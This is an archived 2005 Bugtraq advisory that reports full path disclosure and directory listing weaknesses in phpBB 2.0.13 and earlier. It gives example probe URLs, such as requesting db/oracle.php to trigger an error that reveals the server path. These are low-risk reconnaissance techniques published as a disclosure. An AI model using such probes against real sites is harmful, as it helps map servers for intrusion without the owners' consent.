| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 18 Mar 2005 19:21:17 -0000 From: JoCaNoR SeCuRiTy TeaM <jocanor@...il.com> To: bugtraq@...urityfocus.com Subject: [phpbb <= 2.0.13 full path disclosure & directory listing] [phpbb <= 2.0.13 full path disclosure & directory listing] Author: Jocanor Date= 18-03-2k5 1. -----------introduction-------- phpbb is an high-customizable bulletin board writed in php. Oficial page: http://www.phpbb.com 1. ------------Full path disclossure------------ This error is non critical...but you can get the full path to the forum in the system. exploit: http://www.example.com/db/oracle.php Fatal error: Cannot redeclare sql_nextid() in /www/phpbb2/db/oracle.php on line 405 2.---------Directory listing--------- default installation of phpbb have some directoryes with no index.* file, with this low risc bug you can obtain information of the system, like http daemon. exploits: http://www.example.com/images/smiles/ http://www.example.com/templates/subSilver/images/lang_english/ http://www.example.com/docs/ 3-----greetz-------- /dev/null 4----- Contact ----- Author: Jocanor Location: Spain Email: jocanor [at] gmail [dot] com JoCaNoR SeCuRiTy ReaSoNS EOF.
Powered by blists - more mailing lists